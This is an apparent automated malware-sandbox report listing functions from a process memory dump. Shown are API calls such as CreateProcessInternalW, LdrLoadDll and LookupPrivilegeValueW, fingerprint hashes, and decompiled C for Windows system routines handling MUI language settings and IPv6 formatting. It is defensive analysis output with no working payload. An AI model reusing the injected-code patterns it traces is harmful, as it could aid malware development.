Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 91E01AB12002086BDB14DF59CC45EA777ACAF88750F018554B90857282C630E910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 00087270, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000872CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000872EB

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction ID: 890b9536173f0d1ac96ba421bf0af5f3428debe7a451986ede6eb0716dff7d3d
Opcode Fuzzy Hash: 49ab76c00c9184220b9dbad1f4bc5ba5386cd827cddda64d51339b7d16c96ff1
Instruction Fuzzy Hash: 3601A232A8022877EB20B6949C43FFE776C6B00B51F150118FF44BA1C2E694AA0687F6

Uniqueness

Uniqueness Score: -1.00%

Function 00089B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00089BA2

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: 5ac55fa03450ebc64b1ba5b4960ba0ef4bdd9fbf4f82a0388a50bac58c5ba662
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: BE0100B5E0010DABDF10EAE4ED42FDDB7B8AB54308F044195A91997142F671EB14D791

Uniqueness

Uniqueness Score: -1.00%

Function 0009854D, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 1f8912bf78051f20db1735f18c3e2a287d44ce7161b2495b7320942cc10b55ca
Instruction ID: 004226ef24db8f26f541c75f3e48fb65f9e08b7252f61015e049c1b492290498
Opcode Fuzzy Hash: 1f8912bf78051f20db1735f18c3e2a287d44ce7161b2495b7320942cc10b55ca
Instruction Fuzzy Hash: 5B01AFB2204108AFCB54DF89DC80EEB37AAAF8C354F158258BA0DD7291D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00098550, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: a75b1cc5d5cdda9bd078e5c52ba7b154e600acc1af2e2c97a8f66359dc0dc13e
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: E801AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00097020, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008CCE0,?,?), ref: 0009705C

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction ID: 80d1f6a64ca2ac9d56c1e475fd218f3626d575b84989f62661b6b9b0ced218d5
Opcode Fuzzy Hash: 6d34c6e598135bf535da216d5527c321fb023720bd5cf6a1c6f715cbcdd2cb36
Instruction Fuzzy Hash: B0E06D333912043AE7306599AC02FE7B29C8B81B20F140026FA0DEA2C2D595F80142A4

Uniqueness

Uniqueness Score: -1.00%

Function 00098635, Relevance: 1.5, APIs: 1, Instructions: 32COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098670

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: e0da5ea875306f062bcd523e20d0cf3348fea69b7f43e73512762d4a7813f866
Instruction ID: 877d8d0454b2bdf6b0724d967880a89e7c6c5f1cdcb3e4aa59753a26f27afd09
Opcode Fuzzy Hash: e0da5ea875306f062bcd523e20d0cf3348fea69b7f43e73512762d4a7813f866
Instruction Fuzzy Hash: CDF0A7B51042546BDB10EB65DC45DE77F5CDF82260F1185AEF8885B142C530A814C7F0

Uniqueness

Uniqueness Score: -1.00%

Function 00098640, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0008CFB2,0008CFB2,?,00000000,?,?), ref: 00098670

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: ba115d3dc9753696b117ea0f5378861b5dd38b33d8e5faebc7740d5019f6ccb2
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: F2E01AB12002086BDB10DF49CC85EE737ADAF89650F018154BA0857282C930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0008D418, Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: f028e3f84ab0e97f1f28c51f939e6a495a2769317d983c638e5efb9ba8785eff
Instruction ID: 2a41c19737806932022e366f143837bfeacfcc6aa0b8eb9fcedcadd316124887
Opcode Fuzzy Hash: f028e3f84ab0e97f1f28c51f939e6a495a2769317d983c638e5efb9ba8785eff
Instruction Fuzzy Hash: BFD02E757603082BEA00FFA4DC1BFA233C9BB58B00F485070F9889B3C3D924E8004AA1

Uniqueness

Uniqueness Score: -1.00%

Function 00098513, Relevance: 1.5, APIs: 1, Instructions: 21processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000985A4

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 1d024c6487e4de566cf2b9f67d47c23c0e525d3a33d90065d3b06e79392f9bc0
Instruction ID: 41c02c07925b36955faedfecee02b528858ca2c2e5341552ab9797c864f13cb0
Opcode Fuzzy Hash: 1d024c6487e4de566cf2b9f67d47c23c0e525d3a33d90065d3b06e79392f9bc0
Instruction Fuzzy Hash: FBD067B721450AAB9B08DF99E890DAB73AEEFCD750715C609FA1DC3250D630EC218B70

Uniqueness

Uniqueness Score: -1.00%

Function 0008D420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,00087C73,?), ref: 0008D44B

Memory Dump Source

Source File: 00000007.00000002.2344664416.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 5ee596a1bfbfaa077a92055b3d8a9dc3091a8f25d82d4e0fe3606be2394aea5d
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: 8AD0A7717503043BEA10FAA49C07F6673CD6B44B00F494074F948D73C3D964F9004565

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 023C8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E023C8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E023C8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E023AE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E023C718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E023C8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E023C718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E023C8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E023C8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E023C8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E023C718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E023AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E023A2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E023BE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E023AE2A8(_t322,  &_v68, _v16);
								if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E023BE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E023AE2A8(_t322,  &_v68, _t236);
								if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E023C718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E023AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E023A2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E023BE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E023AE2A8(_v12,  &_v68, _v16);
							if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E023BE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E023AE2A8(_t322,  &_v68, _t269);
							if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E023C718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E023AE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E023A2340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E023BE679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E023AE2A8(_v12,  &_v68, _v16);
						if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E023BE679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E023AE2A8(_t322,  &_v68, _t296);
						if(E023C5553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E023AE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x023c8788
0x023c8788
0x023c8791
0x023c8794
0x023c8798
0x023c879b
0x023c879e
0x023c87a1
0x023c87a4
0x023c87a7
0x023c87aa
0x023c87af
0x02411ad3
0x023c8b0a
0x023c8b0d
0x023c8b13
0x023c8b19
0x023c8b1f
0x023c8b25
0x023c8b2b
0x023c8b31
0x023c8b37
0x023c8b3d
0x023c8b46
0x023c8b46
0x023c87c6
0x023c87d0
0x02411ae0
0x02411ae6
0x02411af8
0x02411af8
0x02411afd
0x02411afe
0x02411b01
0x02411b06
0x02411b06
0x023c87d6
0x023c87f2
0x023c87f7
0x023c8807
0x023c880a
0x023c880f
0x023c8810
0x023c8813
0x023c8818
0x023c8818
0x023c882c
0x023c8831
0x023c8838
0x023c8908
0x023c8920
0x023c89f0
0x023c8a08
0x023c8af6
0x023c8af6
0x023c8af8
0x023c8afb
0x02411beb
0x02411beb
0x023c8b04
0x02411bf8
0x02411c0e
0x02411c13
0x02411c16
0x02411c16
0x02411bf8
0x00000000
0x023c8b04
0x023c8a0e
0x023c8a11
0x023c8a14
0x023c8a15
0x023c8a18
0x023c8a22
0x023c8b59
0x023c8a28
0x023c8a3c
0x023c8a3c
0x023c8a42
0x02411bb0
0x02411b11
0x02411b11
0x00000000
0x023c8a48
0x023c8a51
0x023c8a5b
0x023c8a5e
0x023c8a61
0x023c8a69
0x023c8a69
0x023c8a6d
0x00000000
0x00000000
0x023c8a74
0x023c8a7c
0x023c8a7d
0x023c8a91
0x023c8a93
0x023c8a93
0x023c8a98
0x023c8a9b
0x023c8aa1
0x023c8aa1
0x023c8aa4
0x023c8aaa
0x023c8ab1
0x023c8ac5
0x023c8ac7
0x023c8ac7
0x023c8ac5
0x023c8ace
0x02411bc9
0x02411bce
0x02411bd2
0x02411bd2
0x023c8ad8
0x023c8aeb
0x023c8aeb
0x023c8af0
0x023c8af4
0x00000000
0x023c8af4
0x023c8a42
0x023c8926
0x023c8929
0x023c892c
0x023c892d
0x023c8930
0x023c8935
0x023c893a
0x023c8b51
0x023c8940
0x023c8954
0x023c8954
0x023c895a
0x02411b63
0x00000000
0x023c8960
0x023c8969
0x023c8973
0x023c8976
0x023c8979
0x023c897e
0x023c8981
0x023c8981
0x023c8986
0x00000000
0x00000000
0x02411b6e
0x02411b74
0x02411b7b
0x02411b8f
0x02411b91
0x02411b91
0x02411b99
0x02411b9c
0x02411ba2
0x02411ba2
0x023c898c
0x023c8992
0x023c8999
0x023c89ad
0x02411ba8
0x02411ba8
0x023c89ad
0x023c89b6
0x023c89c8
0x023c89cd
0x023c89d0
0x023c89d0
0x023c89d6
0x023c89e8
0x023c89e8
0x023c89ed
0x00000000
0x023c89ed
0x023c895a
0x023c883e
0x023c8841
0x023c8844
0x023c8845
0x023c8848
0x023c884d
0x023c8852
0x023c8b49
0x023c8858
0x023c886c
0x023c886c
0x023c8872
0x02411b0e
0x00000000
0x023c8878
0x023c8881
0x023c888b
0x023c888e
0x023c8891
0x023c8896
0x023c8899
0x023c8899
0x023c889e
0x00000000
0x00000000
0x02411b21
0x02411b27
0x02411b2e
0x02411b42
0x02411b44
0x02411b44
0x02411b4c
0x02411b4f
0x02411b55
0x02411b55
0x023c88a4
0x023c88aa
0x023c88b1
0x023c88c5
0x02411b5b
0x02411b5b
0x023c88c5
0x023c88ce
0x023c88e0
0x023c88e5
0x023c88e8
0x023c88e8
0x023c88ee
0x023c8900
0x023c8900
0x023c8905
0x00000000
0x023c8905

APIs

_wcspbrk.LIBCMT ref: 023C8891
_wcspbrk.LIBCMT ref: 023C8979
_wcspbrk.LIBCMT ref: 023C8A61
_wcspbrk.LIBCMT ref: 023C8A9B
_wcspbrk.LIBCMT ref: 02411B9C

Strings

Kernel-MUI-Number-Allowed, xrefs: 023C87E6
WindowsExcludedProcs, xrefs: 023C87C1
Kernel-MUI-Language-Allowed, xrefs: 023C8827
Kernel-MUI-Language-SKU, xrefs: 023C89FC
Kernel-MUI-Language-Disallowed, xrefs: 023C8914

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 1d508f8ac7498c09cc35e51e5a86f686c19e202ce4088b31ff1cad21d55701e4
Instruction ID: 3e674bfbf137258f38ace9a1e813d809c67a5d2f12ca4d690a9620fc3f89c9b6
Opcode Fuzzy Hash: 1d508f8ac7498c09cc35e51e5a86f686c19e202ce4088b31ff1cad21d55701e4
Instruction Fuzzy Hash: 47F1C6B2D00209EFCB25EF99C9849EEB7B9FF08304F24446AE605A7611E7359A45DF60

Uniqueness

Uniqueness Score: -1.00%

Function 023E13CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E023E13CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E023D7707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x23a2926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E023D7707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x23a9cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E023D7707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E023D7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E023D7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E023D7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x023e13d5
0x023e13d9
0x023e13dc
0x023e13de
0x023e13e1
0x023e13e8
0x023e13ee
0x0240e8fd
0x00000000
0x0240e921
0x0240e921
0x0240e928
0x0240e982
0x0240e98a
0x00000000
0x0240e99a
0x0240e99e
0x0240e9a3
0x0240e9a8
0x0240e9b9
0x0240e978
0x00000000
0x0240e978
0x0240e98a
0x0240e92a
0x0240e931
0x0240e944
0x0240e944
0x0240e950
0x0240e954
0x0240e959
0x0240e95e
0x0240e963
0x0240e970
0x00000000
0x0240e975
0x0240e93b
0x0240e980
0x00000000
0x0240e980
0x0240e942
0x0240e94b
0x00000000
0x0240e94b
0x00000000
0x0240e942
0x023e13f4
0x023e13f4
0x023e13f9
0x023e13fc
0x023e13ff
0x023e1406
0x0240e9cc
0x0240e9d2
0x0240e9d2
0x0240e9cc
0x023e140c
0x023e1411
0x023e1431
0x023e143a
0x023e143c
0x023e143f
0x023e143f
0x023e1442
0x023e1447
0x023e14a8
0x023e14ac
0x0240e9e2
0x0240e9e7
0x0240e9ec
0x0240ea05
0x0240ea05
0x00000000
0x023e1449
0x00000000
0x023e1449
0x023e144c
0x023e1459
0x023e1462
0x023e1469
0x023e146a
0x023e1470
0x023e1473
0x023e1476
0x023e1476
0x023e1490
0x023e1495
0x023e138e
0x023e1390
0x023e1397
0x023e1398
0x023e1399
0x023e13a1
0x023e13a4
0x023e13a4
0x023e1498
0x023e149c
0x023e149f
0x023e14a2
0x00000000
0x00000000
0x023e14a4
0x00000000
0x023e14a4
0x023e1413
0x023e1415
0x023e1416
0x023e1419
0x023e141c
0x023e1422
0x023e13b7
0x023e13bc
0x023e13bf
0x023e13bf
0x023e13c2
0x023e1424
0x023e1424
0x023e1424
0x023e1427
0x023e142b
0x023e142c
0x023e142c
0x023e142c
0x00000000
0x023e141c
0x023e1411

APIs

___swprintf_l.LIBCMT ref: 023E146B
___swprintf_l.LIBCMT ref: 023E1490
___swprintf_l.LIBCMT ref: 0240E970

Strings

::%hs%u.%u.%u.%u, xrefs: 0240E967
ffff:, xrefs: 0240E94B
:%u.%u.%u.%u, xrefs: 0240E9F4
::ffff:0:%u.%u.%u.%u, xrefs: 0240E9B0

Memory Dump Source

Source File: 00000007.00000002.2345148435.0000000002390000.00000040.00000001.sdmp, Offset: 02380000, based on PE: true

Associated: 00000007.00000002.2345141095.0000000002380000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345260787.0000000002470000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345265116.0000000002480000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345269681.0000000002484000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345273774.0000000002487000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345277757.0000000002490000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.2345312122.00000000024F0000.00000040.00000001.sdmp Download File

Similarity

